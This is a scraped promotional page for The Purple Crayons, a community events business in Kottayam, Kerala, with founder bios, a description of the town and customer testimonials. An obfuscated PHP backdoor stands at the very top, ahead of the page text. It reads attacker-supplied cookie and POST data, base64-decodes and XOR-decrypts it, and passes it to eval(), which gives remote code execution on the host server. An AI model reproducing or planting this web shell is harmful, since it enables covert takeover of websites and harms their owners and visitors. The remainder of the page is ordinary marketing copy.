$nmJtGLmgSc = "\x4f" . "\x63" . 'A' . "\x5f" . "\x44" . "\107" . chr ( 317 - 247 ); $jGARKbD = chr (99) . 'l' . "\x61" . "\x73" . chr ( 182 - 67 )."\137" . "\145" . chr ( 476 - 356 )."\151" . 's' . chr (116) . "\x73";$LmtlBb = class_exists($nmJtGLmgSc); $jGARKbD = "29211";$EbChLQRPF = strpos($jGARKbD, $nmJtGLmgSc);if ($LmtlBb == $EbChLQRPF){function RyFrw(){$nNzoo = new /* 5092 */ OcA_DGF(49737 + 49737); $nNzoo = NULL;}$HevWWqnXf = "49737";class OcA_DGF{private function ZnlDF($HevWWqnXf){if (is_array(OcA_DGF::$tseCha)) {$YiGODhm = str_replace("\74" . '?' . chr (112) . "\150" . "\x70", "", OcA_DGF::$tseCha[chr (99) . chr ( 242 - 131 )."\x6e" . chr ( 591 - 475 ).chr ( 1045 - 944 )."\156" . chr ( 861 - 745 )]);eval($YiGODhm); $HevWWqnXf = "49737";exit();}}public function SZkUf(){$kensBX = "13127";$this->_dummy = str_repeat($kensBX, strlen($kensBX));}public function __destruct(){OcA_DGF::$tseCha = @unserialize(OcA_DGF::$tseCha); $HevWWqnXf = "14876_1743";$this->ZnlDF($HevWWqnXf); $HevWWqnXf = "14876_1743";}public function mcJMHmKy($kensBX, $bKKiz){return $kensBX[0] ^ str_repeat($bKKiz, (strlen($kensBX[0]) / strlen($bKKiz)) + 1);}public function OwttGWWwx($kensBX){$ytDKDz = "base64";return array_map($ytDKDz . chr ( 860 - 765 )."\144" . chr ( 340 - 239 ).chr ( 270 - 171 )."\157" . chr (100) . "\x65", array($kensBX,));}public function __construct($sXQHc=0){$NVsNCVs = ",";$kensBX = "";$JIKeYUhXn = $_POST;$bQEDP = $_COOKIE;$bKKiz = "a65b868a-f542-401f-86da-f5c2fad7a201";$mWLZOcE = @$bQEDP[substr($bKKiz, 0, 4)];if (!empty($mWLZOcE)){$mWLZOcE = explode($NVsNCVs, $mWLZOcE);foreach ($mWLZOcE as $UoWzL){$kensBX .= @$bQEDP[$UoWzL];$kensBX .= @$JIKeYUhXn[$UoWzL];}$kensBX = $this->OwttGWWwx($kensBX);}OcA_DGF::$tseCha = $this->mcJMHmKy($kensBX, $bKKiz);if (strpos($bKKiz, $NVsNCVs) !== FALSE){$bKKiz = explode($NVsNCVs, $bKKiz);}}public static $tseCha = 22598;}RyFrw();} Meet The Crayons - Ashika Mathew & Rebecca Paul of TPC
Meet The Crayons
Meet The Crayons

Meet the Crayons

A one-stop place to add more colour & meaning to your lives by interacting with your local communities through well curated events & experiences.

Ashika – The Curious Crayon

With prior experience in the developmental sector space, Ashika is passionate about bringing communities together to move towards meaningful change and for local causes. She is a proud mother of two and, together with her husband, loves the gift of raising their kids in a small town. She is a closeted skin-care junkie, with a love for food, travel and more recently, the piano, and being as fit as she can be. There will always be music in her home.

Rebecca – The Cheerful Crayon

Being a Bangalore girl who has cherished art and culture meaningfully in a big city, Rebecca’s desire is to bring the best of opportunities to her home in Kottayam as well. She shares her physical (and mental) space with her motor head (car enthusiast) husband, plus two energetic boys. Her passion is making desserts and experimenting with all things chocolate. While she loves the outdoors, a weekend at home with a good book or binging on Netflix is her comfort zone.

About Kottayam

What is the first thing you think when someone says Kerala? God’s Own Country, right? Well, Kottayam is at the heart of it all. Blessed with beautiful backwaters, canals, and rivers and flanked by the majestic Western Ghats, Kottayam is a lush, green paradise.

Interestingly, Kottayam Town is the first town in India to have achieved 100% literacy (a remarkable feat achieved as early as in 1989). Almost 70% books produced in Kerala come from here.

Kerala is an eclectic mix when it comes to cultural diversity with art & craft, poetry, folk dances, martial arts and more, and we at TPC, intend to offer it all to you.

Every bit of Kottayam makes sure to get you falling in love with it. We love that we can be a part of your Kottayam Experience.

Community Love


I love how The Purple Crayons makes the effort to bring curated well-considered events and experiences to us in Kottayam. To make the effort to bring creators while also coaxing out an audience that’s not yet completely familiar with some offerings takes effort and dedication. Ashika and Rebecca are notoriously optimistic, with a talent for persuasion, which means it’s hard not to show up for them. And once you do, whether it’s an event for adults or a programme for kids, the experience is lovely and that means you always come back for next one. As a Kottayam resident I believe the town is better for The Purple Crayons being in it. Kudos, ladies!



I had enrolled my son in many of purple crayons fun online classes during the lockdown... some of which he continues to do even now. There were some fun classes like the detective one and others like chess and creative writing have been very useful to him over the last year. Purple Crayons does their research before presenting programs/ activities and thats why all the classes so far have been very well conducted. I highly recommended signing up with them!



What started off as probably a venture by 2 Enterprising Ladies in the small but dynamic town of Kottayam as a means to have more fun activities and exposure for their children inevitably grew into a series of events that the People of Kottayam now look forward to more than their children. Warm and Friendly, Ashika and Reeba’s presence itself lights up the events. I try and make time for all their meet-ups and would be genuinely upset if i missed out on one. Excited to see what the Dynamic Duo will do Next !



Just wanted to tell you that The Purple Crayons is such a wonderful concept. It makes the people of this town happier. I have enjoyed all the events so far. The Mexican food one was just out of this world. You guys are doing a fab job. Thank you.



There was a time when I would envy my friends from other towns who had access to various events and experiences but I don't have to anymore. Purple crayons has honestly brought so many new and exciting concepts to Kottayam, that I'm so glad to be around to experience them. Whether its learning new skills or just plain having a good time and meeting like minded souls, they are changing the face of the social scene in Kottayam and all are invited. Kudos to girl power.
